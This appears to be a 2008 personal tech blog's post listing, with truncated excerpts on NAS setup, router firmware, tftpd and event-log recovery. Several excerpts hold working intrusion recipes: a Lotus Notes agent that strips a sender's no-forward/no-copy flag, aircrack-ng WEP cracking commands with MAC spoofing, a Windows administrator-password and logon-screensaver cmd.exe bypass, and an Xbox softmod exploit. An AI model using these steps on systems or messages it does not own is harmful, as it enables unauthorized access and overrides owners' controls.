Showing posts from 2008

Remove Prevent Copy / Forward / Print From Email In Lotus Notes

I Had an issue today that required me to forward an email to a colleague to review. However the sender had prevent the "Copying" , Printing , Forwarding of this particular email and they were unable to one reason or another to resend it.
So I fired up Domino Designer and added the following agent to the "Actions" Menu of my mailfile.
I'm not going to even go into the morles and ethics of removing these so called "security features" from emails so please dont start going off on a rant.

FIELD $KeepPrivate := $KeepPrivate;
@If($KeepPrivate != "";
@Prompt([OK];"$KeepPrivate Flag Disabled";
"The selected message can now be forwarded/copied!"));
@Prompt([OK];"$KeepPrivate Flag Not found";
"The selected message does not appear to have forwarding/copying disabled.")

Budget NAS Box

I recently picked up 2 of these in Maplin along with 2x 300GB IDE hard drives.

They work out of the box. Just plug in to you existing network, setup the share name and permissions via the builtin web interface, map to the drive(s) on you workstaion and your good to go. The LANDisk can also act as a DHCP server.

I was having some intermittant issuse with one of the devices locking up so I updated the firmware. The chipset (Conceptronic CHD3NET) is the same as that used on some other devices so I loaded the latest one I cauld find from here. including bootloader.

The site also has a firmware loader to ease the update process.

One point to note is that the deivce formats the drive as FAT32 not EXT2 or NTFS. This may be an issue for you if you have files over 2GB.

Turn A Cheap Linksys Router Into A Powerful (almost) Enterprise Level Router

I picked up one of these off eBay for testing a
Linksys WRT54GS v1.1 and installed dd-wrt on it.
Its a fantastic firmware modification. I can now setup as many vlans as I want on both the LAN and WLAN interfaces. Its also possible to put the wireless side of the device into client mode to create a bridge. I am currently testing the OpenVPN aspect of box. Take a look at for more info.

Setup Guide is here..

Wireless Pen-Testing

No Client WEP Cracking

This is a quick bullet point step by step guide to wireless password cracking
Your wireless interface is "ath0"

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
=== copy BSSID
airodump-ng -c -6 -w filesname --bssid ath0
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b -h 00:11:22:33:44:55 ath0
aircrack-ng -n 64 OR 128 -0 --bssid filename.cap


No Client Korek Chopchop Attack

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
#ctrl+c when you see your network
#make a note of the bssid and chan
airmon-ng -c -w --bssid ath0
# leave it running ... open a new shell
aireplay-ng -1 0 -e -a -h 00:11:22:33:44:55 ath0
aireplay-ng -4 -h 00:11:22:33:44:55 -b -h 00:11:22:33:44:55 -k -l -y -w
# now to inject the ARP pa…

Running tftpd as a service on a windows machine

I'm using jounin's tftpd32 (download from here: ) for netbooting stations in places that I don't have UNIX servers, and found this tool very usefull.

Here is my instructions for making it a Windows Service using MS instsrv.exe and srvany.exe from Windows 2000 Resource Kit.

* Download tftpd
* Install tftpd on your system, I installed it on C:\Program Files\tftpd , and my explanation will be using this dir.
* Get the files instsrv.exe and srvany.exe from the Resource Kit and copy them to a directory on your system (I copied them to C:\Tools)
* Open a cmd (Start -> Run -> cmd) and do the followings:
o c:
o cd \Tools
o instsrv tftpd c:\Tools\srvany.exe
* Open the registry (Start -> Run -> regedt32)
* Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tftpd : create a 'Parameters' key
* Under the above key, create a new 'String Value' with the name 'Application' of type R…

Windows Password Reset

Use Petter's disk to reset the MACHINE Administrator password to "no password".

Reboot, hit F8, and enter "Directory Service Recovery Mode". The machine will boot up as a standalone server without any Active Directory support.

When the login screen appears, hit CTRL-ALT-DEL and log in as "Administrator" with no password. This is the MACHINE Administrator account, and does not have the ability to modify anything specific involving the Active Directory information, although it can backup and restore the physical files which contain the AD databases.

Run "regedit". Navigate to HKEY_USERS\.Default\Control Panel\Desktop and change the following values:
Value Original Change to
SCRNSAVE.EXE logon.scr cmd.exe
ScreenSaveTimeout 900 15

Reboot normally. When the box appears asking you to hit CTRL-ALT-DEL to log in, just wait. After 15-30 seconds you will see a command prompt appear (since that is the screensaver.…

Procedure For Recovering A Corrupted Event Log

On an active system, new events are written to the end of the log file. When a soft-shutdown is performed, the log data is realigned to its proper location. If a hard shutdown or live acquisition is performed, this data may not have been properly flushed creating an unreadable log file. The results in a log file is corrupt error.

Steps to Recover:

1. Copy out the Windows event log you are interested in (e.g. SecEvent.Evt, SysEvent.Evt or AppEvent.Evt).

2. Before proceeding, try to open the file with your event viewer. If you get the message, “The event log is corrupted”, then continue with the following steps.

3. Open the Event Log with a HEX file editor (e.g. UltraEdit, HexEdit, WinHex, etc).

4. Search for the ASCII (TEXT) string: 3333DDDD.

5. This puts you right in the middle of the HEX string: 11 11 11 11 22 22 22 22 33 33 33 33 44 44 44 44

6. The “11 11 11 …” hex string is the start of the log file header. The four bytes immediately preceding the “11 11 11…” should be (hex) 28 00 00 00. …

How to softmod your xbox

How to softmod your xbox

This may not be the best way but its worked for me.

Your going to need the following

I dont need to say xbox do I ?? ... Internet Connection ?? ... Hard drive ??

xbox memory card. I've heard that M$ branded ones work best, I used a Mega-X-Key only cos I have one gathering dust in my box of computer bits.

Based on what other sites mention..
Any version of Tom Clancy's Splinter Cell
The original version of 007: Agent Under Fire or the Platinum Hits Agent Under Fire with the Serial #: 1448517 (NOT 1448527)
Mech Assault with the Serial #: MS02301L on the inner ring of the game CD
IRC Client
FTP Client

I picked up a copy of Splinter Cell in the Pre-Owned games section of a local store for 3 quid.

Next your going to need an All-In-One Exploit package, which you can get from xbins on irc.
If you dont know how to connect, google "xbins" theres LOTS of sites out there that explain it.

Ok ..... the vo…